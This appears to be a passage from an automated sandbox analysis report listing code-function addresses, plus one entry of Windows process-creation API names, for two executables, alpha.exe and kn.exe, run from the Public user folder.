      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC0A6C3_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBAA543_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC42243_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC55543_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC37D83_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD7F003_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB6EE43_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBE6803_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDEE883_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB52403_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBD2503_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB9E503_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB76503_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB22203_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB4A303_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAA303_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB8DF83_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBCE103_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDD9D03_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB81D43_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DE15383_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB7D303_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB85103_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DBB0D83_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC18D43_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB18843_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC78543_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAC4C3_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB2C483_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB34103_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB6BE03_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DDAFBC3_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB3F903_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB5B703_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB9B503_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB372C3_2_00007FF7E1DB372C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC0A6C5_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBAA545_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC42245_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC55545_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC37D85_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DD7F005_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB6EE45_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBE6805_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDEE885_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB52405_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBD2505_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB9E505_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB76505_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB22205_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB4A305_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAA305_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB8DF85_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBCE105_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDD9D05_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB81D45_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DE15385_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB7D305_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB85105_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DBB0D85_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC18D45_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB18845_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC78545_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAC4C5_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB2C485_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB34105_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB6BE05_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DDAFBC5_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB3F905_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB5B705_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB9B505_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB372C5_2_00007FF7E1DB372C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59C1206_2_00007FF67C59C120
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59BC106_2_00007FF67C59BC10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C38006_2_00007FF67C5C3800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C2F386_2_00007FF67C4C2F38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59F0206_2_00007FF67C59F020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59CCB86_2_00007FF67C59CCB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54BDA06_2_00007FF67C54BDA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BDD846_2_00007FF67C5BDD84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C509D6C6_2_00007FF67C509D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C511D706_2_00007FF67C511D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C567D706_2_00007FF67C567D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C541E2C6_2_00007FF67C541E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E5DF76_2_00007FF67C4E5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C1DE86_2_00007FF67C4C1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50DEA46_2_00007FF67C50DEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53DEB06_2_00007FF67C53DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53BE706_2_00007FF67C53BE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C545F046_2_00007FF67C545F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C501ED06_2_00007FF67C501ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C539EE46_2_00007FF67C539EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B1F806_2_00007FF67C4B1F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5180186_2_00007FF67C518018
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C569FF86_2_00007FF67C569FF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E80806_2_00007FF67C4E8080
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5820846_2_00007FF67C582084
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51C0B86_2_00007FF67C51C0B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5319AC6_2_00007FF67C5319AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F9906_2_00007FF67C53F990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A79386_2_00007FF67C5A7938
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A994C6_2_00007FF67C5A994C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B1A106_2_00007FF67C4B1A10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DF9B86_2_00007FF67C4DF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C7AB46_2_00007FF67C4C7AB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C569A586_2_00007FF67C569A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E3A406_2_00007FF67C4E3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52BA486_2_00007FF67C52BA48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C501A606_2_00007FF67C501A60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57BB286_2_00007FF67C57BB28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C517AC86_2_00007FF67C517AC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BFB846_2_00007FF67C4BFB84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C521B846_2_00007FF67C521B84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B5BA46_2_00007FF67C4B5BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C547B746_2_00007FF67C547B74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55FB506_2_00007FF67C55FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50FC346_2_00007FF67C50FC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EFC206_2_00007FF67C4EFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C563C106_2_00007FF67C563C10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D9BC86_2_00007FF67C4D9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51DBF06_2_00007FF67C51DBF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BFC906_2_00007FF67C5BFC90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CBCA46_2_00007FF67C4CBCA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C531C906_2_00007FF67C531C90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C503C606_2_00007FF67C503C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C5D086_2_00007FF67C4C5D08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EDD206_2_00007FF67C4EDD20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E9CD06_2_00007FF67C4E9CD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50BCE86_2_00007FF67C50BCE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C579CC06_2_00007FF67C579CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EB58C6_2_00007FF67C4EB58C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5895806_2_00007FF67C589580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E156C6_2_00007FF67C4E156C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BF6106_2_00007FF67C4BF610
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5395FC6_2_00007FF67C5395FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5155F06_2_00007FF67C5155F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56D6A06_2_00007FF67C56D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5076B06_2_00007FF67C5076B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5676786_2_00007FF67C567678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5976786_2_00007FF67C597678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F56486_2_00007FF67C4F5648
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5856606_2_00007FF67C585660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5936386_2_00007FF67C593638
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD6606_2_00007FF67C4DD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F6D86_2_00007FF67C53F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58D6DC6_2_00007FF67C58D6DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB7886_2_00007FF67C4CB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5097906_2_00007FF67C509790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5337606_2_00007FF67C533760
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5638206_2_00007FF67C563820
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CF8006_2_00007FF67C4CF800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D18306_2_00007FF67C4D1830
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F17D46_2_00007FF67C4F17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51D7F06_2_00007FF67C51D7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5277C86_2_00007FF67C5277C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5178906_2_00007FF67C517890
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54D8586_2_00007FF67C54D858
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5838746_2_00007FF67C583874
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54184C6_2_00007FF67C54184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5058CC6_2_00007FF67C5058CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F1686_2_00007FF67C53F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5011C86_2_00007FF67C5011C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CD1B86_2_00007FF67C4CD1B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5031E06_2_00007FF67C5031E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58D2B46_2_00007FF67C58D2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5652906_2_00007FF67C565290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5453186_2_00007FF67C545318
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5292D86_2_00007FF67C5292D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BF2C06_2_00007FF67C4BF2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50D2C06_2_00007FF67C50D2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5192C46_2_00007FF67C5192C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59B3AC6_2_00007FF67C59B3AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E73406_2_00007FF67C4E7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DB36C6_2_00007FF67C4DB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B73F86_2_00007FF67C4B73F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FF4346_2_00007FF67C4FF434
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52D4106_2_00007FF67C52D410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A33D06_2_00007FF67C5A33D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B33D46_2_00007FF67C5B33D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A94A86_2_00007FF67C5A94A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5174786_2_00007FF67C517478
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D54A06_2_00007FF67C4D54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5694946_2_00007FF67C569494
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55D4606_2_00007FF67C55D460
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FD4406_2_00007FF67C4FD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B54386_2_00007FF67C4B5438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52F5206_2_00007FF67C52F520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5814F06_2_00007FF67C5814F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C526D7C6_2_00007FF67C526D7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DEDA46_2_00007FF67C4DEDA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C592D6C6_2_00007FF67C592D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C598EAC6_2_00007FF67C598EAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C594E586_2_00007FF67C594E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D8F1C6_2_00007FF67C4D8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EEED46_2_00007FF67C4EEED4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B6EF46_2_00007FF67C4B6EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E4F906_2_00007FF67C4E4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C554F946_2_00007FF67C554F94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B10306_2_00007FF67C4B1030
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F107C6_2_00007FF67C4F107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB09C6_2_00007FF67C4CB09C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50D0946_2_00007FF67C50D094
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C6_2_00007FF67C57511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5169846_2_00007FF67C516984
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5089906_2_00007FF67C508990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B29406_2_00007FF67C4B2940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53AA006_2_00007FF67C53AA00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A9F06_2_00007FF67C58A9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5109EC6_2_00007FF67C5109EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51E9F06_2_00007FF67C51E9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53EA7C6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C536A846_2_00007FF67C536A84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59AA586_2_00007FF67C59AA58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A4A586_2_00007FF67C5A4A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C584A406_2_00007FF67C584A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C504B306_2_00007FF67C504B30
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C566B946_2_00007FF67C566B94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D4B686_2_00007FF67C4D4B68
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BAC086_2_00007FF67C4BAC08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FCBFC6_2_00007FF67C4FCBFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C500C286_2_00007FF67C500C28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C528BD46_2_00007FF67C528BD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54CCA86_2_00007FF67C54CCA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52CC806_2_00007FF67C52CC80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BCC8C6_2_00007FF67C5BCC8C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588C586_2_00007FF67C588C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C512D186_2_00007FF67C512D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C508D2C6_2_00007FF67C508D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C8D006_2_00007FF67C4C8D00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C542CF86_2_00007FF67C542CF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50CD106_2_00007FF67C50CD10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A8CF46_2_00007FF67C5A8CF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5025806_2_00007FF67C502580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A85A86_2_00007FF67C5A85A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54E57C6_2_00007FF67C54E57C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51655C6_2_00007FF67C51655C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E85706_2_00007FF67C4E8570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5845386_2_00007FF67C584538
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5186306_2_00007FF67C518630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57C6306_2_00007FF67C57C630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B85EC6_2_00007FF67C5B85EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C05E06_2_00007FF67C4C05E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C6F86_2_00007FF67C52C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51C6D06_2_00007FF67C51C6D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A67506_2_00007FF67C5A6750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53C7F06_2_00007FF67C53C7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5327D06_2_00007FF67C5327D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5607D06_2_00007FF67C5607D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53E8446_2_00007FF67C53E844
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A28546_2_00007FF67C5A2854
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5948C46_2_00007FF67C5948C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5908C86_2_00007FF67C5908C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D01406_2_00007FF67C4D0140
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B81706_2_00007FF67C4B8170
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57821C6_2_00007FF67C57821C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C41F86_2_00007FF67C5C41F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53A1E86_2_00007FF67C53A1E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50C1D06_2_00007FF67C50C1D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50E29C6_2_00007FF67C50E29C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D227C6_2_00007FF67C4D227C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5262806_2_00007FF67C526280
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5942746_2_00007FF67C594274
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5103986_2_00007FF67C510398
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FE3A06_2_00007FF67C4FE3A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5463746_2_00007FF67C546374
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59234C6_2_00007FF67C59234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D44106_2_00007FF67C4D4410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59E4306_2_00007FF67C59E430
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C842F6_2_00007FF67C5C842F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BA4246_2_00007FF67C4BA424
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5384146_2_00007FF67C538414
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5443D06_2_00007FF67C5443D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F64A86_2_00007FF67C4F64A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5084846_2_00007FF67C508484
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5904906_2_00007FF67C590490
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5484886_2_00007FF67C548488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C4506_2_00007FF67C52C450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52A4506_2_00007FF67C52A450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BC5206_2_00007FF67C4BC520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5984D86_2_00007FF67C5984D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53E4F06_2_00007FF67C53E4F0
